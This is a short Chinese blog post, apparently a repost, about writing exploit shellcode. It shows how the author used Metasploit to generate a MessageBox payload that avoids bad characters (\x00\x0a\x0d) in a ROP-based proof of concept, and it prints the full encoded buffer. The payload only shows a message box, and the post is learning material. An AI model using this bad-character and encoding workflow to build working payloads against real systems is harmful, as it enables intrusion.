shellcode学习有两个方向,一个是专心研究跳板ROP之类,另一个是专心研究payload部分。为了分清楚最近的任务,所以先放弃研究shellcode,从msf上直接拿过来用了。
在看rop链的生成原理,都还好,在执行shellcode的时候,发现在执行过程中有问题。仔细查看了下布局之后,发现poc利用中对 bad chars 有截断,需要过滤。使用msfpayload模块默认生成的弹窗根本用不了啊,使用0day2上给的shellcode也是因为坏字符‘0A’的存在。
所以只能使用过滤了。
root@bogon:~# msfconsole
msf > use payload/windows/messagebox
msf payload(messagebox) > generate -b ‘\x00\x0a\x0d‘ -t python
# windows/messagebox - 297 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO
buf = ""
buf += "\xb8\xdc\xa5\x17\xe0\xda\xcd\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x44\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x3e"
buf += "\x50\xce\x0b\x25\x42\x85\xef\xad\x44\xb4\x42\x3a\x96"
buf += "\xf1\xc7\x4f\xa9\x31\x83\x39\x46\xb9\xe5\xd9\xdd\xfb"
buf += "\x01\x6a\x9f\x23\x99\x5a\x58\x6b\x85\xd7\x6b\x2a\xb4"
buf += "\xc6\x73\x2c\xd6\x63\xe7\x8b\x33\xf8\xbd\xef\xb0\xaa"
buf += "\x15\x68\xc6\xb8\xed\xc2\xd0\xb7\xa8\xf2\xe1\x2c\xaf"
buf += "\xc7\xa8\x39\x04\xa3\x2a\xd3\x54\x4c\x1d\xeb\x6b\x1e"
buf += "\xda\x2b\xe7\x58\x22\x64\x05\x66\x63\x91\xe2\x53\x17"
buf += "\x41\x23\xd1\x06\x02\x69\x3d\xc8\xff\xe8\xb6\xc6\xb4"
buf += "\x7f\x92\xca\x4b\x6b\xa8\xf7\xc0\x6a\x47\x7e\x92\x48"
buf += "\x8b\xe0\xd9\x23\xbb\xcb\x09\xca\x59\x82\x73\xa5\x2f"
buf += "\xdb\x7d\xda\x62\x0c\x1e\xdd\x7c\x33\xa9\x67\x87\x77"
buf += "\xd7\xbf\x65\xf4\xa0\x5c\x4e\xa9\x46\xd2\x71\xb2\x69"
buf += "\x62\xc8\x45\xfd\x19\xbf\x75\xbc\x89\x0c\x44\x10\x2e"
buf += "\x1b\xdd\x1f\xcb\xa9\x95\x83\x37\x44\x2f\xdd\x6e\xa7"
buf += "\x7a\x25\x06\x95\xd5\x9e\xb0\xb8\x9b\x5c\x47\xa0\x07"
buf += "\xce\xa0\xb8\xb8\x11\xcf\x53\x28\x95\x68\x84\xde\x04"
buf += "\xee\xa1\x5c\xae\xbd\x4c\x12\x5d\x0f\x54\x5c\xfd\x4b"
buf += "\x60\xd4\x1e\xfb\x2c\xc6\xc0\xdc\xa4\x4b\x53\x5b\x14"
buf += "\x3c\x21\x0c\x3b\x9c\xad\xbd\xef\xfc\x4b\x2a\xb8\x99"
buf += "\xff\xc6\x09\xab\x77\x5a\x4e\x3b\x0e\x82\xbf\xe9\x42"
buf += "\x16\x91\x5f\x9d\x48\x20\xa0\x31\x96\x16\x28"
点击链接查看generate的正确姿势click me
原文地址:http://blog.csdn.net/bugmeout/article/details/45271233